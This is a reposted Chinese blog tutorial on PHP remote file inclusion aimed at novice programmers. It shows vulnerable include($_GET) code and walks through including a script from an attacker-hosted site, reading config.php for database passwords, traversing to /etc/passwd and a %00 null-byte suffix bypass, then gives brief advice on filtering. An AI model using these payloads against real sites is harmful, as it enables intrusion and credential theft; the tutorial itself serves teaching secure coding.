dinggela 发表于 2018-12-21 08:04:10

php远程文件包含漏洞简述

https://static1.运维网.com/edu/blog/mobile/images/share_default.jpg

[*]首页
[*]文章
[*]关注
[*]订阅专栏
[*]专家


[*]网站导航学院博客下载家园论坛CTO训练营CTO俱乐部WOT运维网
[*]注册
[*]登录
[*]手机阅读https://static1.运维网.com/edu/blog/images/blog_qr.png  扫一扫体验手机阅读
[*]搜索
[*]写文章
在线  客服
转载php远程文件包含漏洞简述
http://ucenter.运维网.com/images/noavatar_middle.gifvirus关注0人评论1809人阅读2007-02-25 20:48:26  在这篇文章里我会告诉php远程文件包含漏洞的原理,初涉程序员的人必看。
  首先的问题是,什么才是”远程文件包含漏洞“?简要的回答是服务器通过php的任意文件包含过滤不严,从而去执行一个恶意文件,这是个程序员过滤上的问题,请记住,所有的cgi程序都有这样的bug。
  1.找出bug:
  为了发现目标,我们首先要知道包含两个字的含义,在所有语言里(大多数)都有这种方法包含任意的文件。在php里,我们使用include()函数,它的工作流程:
  如果你在Main.php里包含include1.php,我将这样写include("include1.php").不是很科学,但你要知道其中的道理。
  我们先看这个,当用户输入通过后就包含文件,也就是
if ($_GET) {  include $_GET;
  } else {
  include "home.php";
  }
  这种结构在动态网站里是常见的,问题是它允许这样 http://www.target.com/explame.php?page=main.php 或者http://www.target.com/explame.php?page=downloads.php来查看。无论如何,如果你的程序里有这样的bug也很悲哀了,只能怪你,尽管只是一句过滤的问题,但就是这一句过滤就有了Script hacker.在zone-h.org的调查里,文件包含的***率占到9.4%,足够我们引起重视,而且它也不是一两天的问题,几年前就有了,但到了今天,一批一批程序员依旧走老路重走,所以就有了这篇文章,在2004年写这样的文章已经老掉牙,但我还是要写,毕竟牢骚能让人收益的时候就不叫牢骚了。
  2.测试
  这里有个远程文件包含的例子,目的只有一个,为了你的程序安全,我们来看具体的
  http://www.target.com/explame.php?page=zizzy
Warning: main(zizzy): failed to open stream: No such file or directory in /var/www/htdocs/index.php on line 3  Warning: main(): Failed opening 'zizzy' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/index.php on line 3
  php输出的这些错误信息告诉我们,程序去包含文件/var/www/htdocs/zizzy,但没找到,看见了吧,No such file or directory没这样的文件,现在理解了吧。
  3.利用
  php确实很好,可以远程调用文件,那我创建一个yeah.txt,放在我的站上http://www.mysite.com/yeah.txt.内容这样

  那么http://www.target.com/explame.php?pa...e.com/yeah.txt
  OK,回显Wow,test!,这样就执行了。读取config.php也不难吧,里面放了mysql密码啊。把yeah.txt写成看看,写成system()去试试,有什么感想,在过分点,这样提交page=../../../../../../../etc/passwd。知道什么叫真正的包含了吧。
  4.另一种
  有时程序员换种写法,写成这样,限制了包含范围
if ($_GET) {  include "$_GET.php";
  } else {
  include "home.php";
  }
  我们提交http://www.target.com/explame.php?pa...e.com/yeah.txt
Warning: main(http://www.mysite.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3  Warning: main(): Failed opening 'http://www.mysite.com/yeah.txt.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/explame.php on line 3
  包含失败了,限制了后缀名为php,那mysite.com的yeah.txt改为yeah.php,ok,照样执行了
  那passwd怎么办
Warning: main(../../../../../../../etc/passwd.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3  Warning: main(): Failed opening '../../../../../../../etc/passwd.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/explame.php on line 3
  在这里使用个NUL字符,也就是%00来跳过检测
  http://www.target.com/explame.php?pa.../etc/passwd%00
  看见了吧。
  5.建议
  包含文件时最好指定好包含哪一个文件,或者过滤好提交的的变量,这也就是这篇文章的目的,不是写给hacking的人看,而是写给那些初涉程序员的人,这样的文章网上很多,只要有人受益,也就达到目的了。
php职场休闲H4c|  0
  分享
  收藏
上一篇:如何成为一个网络安全专家下一篇:网页***综述http://ucenter.运维网.com/images/noavatar_middle.gifvirus458篇文章,192W+人气,1粉丝
关注http://ucenter.运维网.com/images/noavatar_middle.gif  Ctrl+Enter 发布
发布
  取消
推荐专栏
http://i2.运维网.com/images/blog/201808/09/b0ae5cad7badb680f57306401282e827.png Web网站安全评估分析及防御企业级网安运维
共30章 | simeon2005
¥51.00266人订阅
订   阅http://i2.运维网.com/images/blog/201808/03/a201c215fdaddf0d4e73a09b6bdd8e83.png JavaScript全栈工程师养成记20年软件开发心法
共17章 | 边城__
¥51.00304人订阅
订   阅猜你喜欢
CET "两遍阅读法"TIPSsymfony源码分析之容器的生成与使用PHP类推荐:QueryList|基于phpQuery的无比强大的PHP采集工具当网站性能遭遇瓶颈的时候Laravel 5.5+ Dingo +Jwt 快速搭建 API系统PHP多进程开发与Redis结合实践使用Swoole测试MySQL在特定SQL下的并发性能http://i2.运维网.com/images/blog/201810/22/078772c84eb23213ea90f577d9316ce4.pnghttps://static1.运维网.com/edu/blog/mobile/images/left-qr.jpg  扫一扫,领取大礼包
  0
分享关注virushttp://ucenter.运维网.com/images/noavatar_middle.gif   
页: [1]
查看完整版本: php远程文件包含漏洞简述